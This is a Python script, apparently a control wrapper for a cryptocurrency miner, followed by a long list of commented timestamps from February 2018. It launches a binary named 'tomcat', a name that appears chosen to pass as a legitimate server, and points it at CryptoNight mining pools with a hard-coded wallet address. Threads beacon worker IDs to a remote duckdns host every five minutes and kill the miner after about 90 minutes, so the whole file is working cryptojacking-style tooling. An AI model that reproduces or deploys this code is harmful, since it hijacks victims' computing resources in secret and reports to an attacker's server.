import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:59:06.434053
#2018-02-17 16:47:06.898358
#2018-02-17 18:35:07.561648
#2018-02-17 20:23:03.691591
#2018-02-17 22:10:07.654453
#2018-02-17 23:54:07.108029
#2018-02-18 01:44:06.437572
#2018-02-18 03:31:06.943147
#2018-02-18 05:18:04.799968
#2018-02-18 07:10:08.773577
#2018-02-18 08:58:05.633982
#2018-02-18 10:45:07.555790
#2018-02-18 12:28:06.895766
#2018-02-18 14:16:05.457812
#2018-02-18 16:06:06.638181
#2018-02-18 17:54:06.402532
#2018-02-18 19:42:01.866802
#2018-02-18 21:27:04.502053
#2018-02-18 23:16:04.295330
#2018-02-19 01:03:01.840107
#2018-02-19 02:50:05.618181
#2018-02-19 04:37:04.987291
#2018-02-19 06:21:05.383060
#2018-02-19 08:09:04.059184
#2018-02-19 09:59:08.101712
#2018-02-19 11:48:06.451055
#2018-02-19 13:33:06.727151
#2018-02-19 15:22:02.105192
#2018-02-19 17:10:01.676187
#2018-02-19 18:58:05.214547
#2018-02-19 20:45:10.632344
#2018-02-19 22:33:06.452413
#2018-02-20 00:18:05.943070
#2018-02-20 02:06:01.441819
#2018-02-20 03:55:08.233908
#2018-02-20 05:41:01.826332
#2018-02-20 07:26:07.124321
#2018-02-20 09:11:01.212582
#2018-02-20 10:53:07.434878
#2018-02-20 12:42:05.357642
#2018-02-20 14:27:08.598075
#2018-02-20 16:12:06.826360
#2018-02-20 17:58:07.925700
#2018-02-20 19:48:08.404942
#2018-02-20 21:37:08.442382
#2018-02-20 23:19:06.658684
#2018-02-21 01:03:07.321589
#2018-02-21 02:51:05.393973
#2018-02-21 04:40:09.263151
#2018-02-21 06:27:05.541593
#2018-02-21 08:13:04.352963
#2018-02-21 09:59:07.288506
#2018-02-21 11:47:01.815569
#2018-02-21 13:38:01.450829
#2018-02-21 15:23:04.432632
#2018-02-21 17:15:10.120263
#2018-02-21 19:04:06.707303
#2018-02-21 20:52:07.643779
#2018-02-21 22:39:01.995350
#2018-02-22 00:28:05.891707
#2018-02-22 02:16:01.554240
#2018-02-22 04:02:04.404915
#2018-02-22 05:48:05.587789
#2018-02-22 07:33:04.676503
#2018-02-22 09:21:08.005100
#2018-02-22 11:07:06.906967
#2018-02-22 12:53:02.200007
#2018-02-22 14:39:09.070508
#2018-02-22 16:25:09.505967
#2018-02-22 18:13:08.215332
#2018-02-22 20:04:08.830679
#2018-02-22 21:52:02.258241
#2018-02-22 23:39:01.693877
#2018-02-23 01:26:05.632421
#2018-02-23 03:11:08.155809
#2018-02-23 05:00:01.836259
#2018-02-23 06:44:05.583623
#2018-02-23 08:37:01.296077
#2018-02-23 10:51:08.007022
#2018-02-23 12:48:09.329788
#2018-02-23 14:33:09.488854
#2018-02-23 16:23:05.927765
#2018-02-23 18:09:02.132442
#2018-02-23 19:55:04.811110
#2018-02-23 21:38:01.403686
#2018-02-23 23:25:02.991088
#2018-02-24 01:18:01.880278
#2018-02-24 03:11:06.618794
#2018-02-24 04:56:06.235991
#2018-02-24 06:44:06.375704
#2018-02-24 08:37:01.607088
#2018-02-24 10:22:03.608859
#2018-02-24 12:17:03.949597
#2018-02-24 14:09:05.075533
#2018-02-24 15:56:04.691113
#2018-02-24 17:47:07.156827
#2018-02-24 19:34:06.743438
#2018-02-24 21:21:07.515295
#2018-02-25 00:01:06.879848
#2018-02-25 04:17:05.037953
#2018-02-25 07:48:02.116386